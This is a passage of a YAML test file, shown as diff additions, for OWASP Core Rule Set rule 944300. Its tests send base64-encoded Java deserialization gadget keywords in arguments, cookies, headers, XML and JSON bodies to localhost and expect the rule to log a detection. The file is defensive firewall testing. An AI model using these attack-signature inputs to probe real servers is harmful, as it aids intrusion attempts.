port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-129 + desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: 
+ log_contains: "id \"944300\"" + - test_title: 944300-130 + desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-131 + desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-132 + desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-133 + desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-134 + desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-135 + desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-136 + desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-137 + desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-138 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-139 + desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-140 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-141 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-142 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-143 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-144 + desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-145 + desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-146 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-147 
+ desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-148 + desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-149 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-150 + desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-151 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-152 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-153 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-154 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-155 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-156 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-157 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-158 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-159 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-160 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-161 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-162 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-163 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + 
log_contains: "id \"944300\"" + - test_title: 944300-164 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-165 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-166 + desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-167 + desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-168 + desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-169 + desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-170 + desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-171 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-172 + desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-173 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" 
+ data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-174 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-175 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-176 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 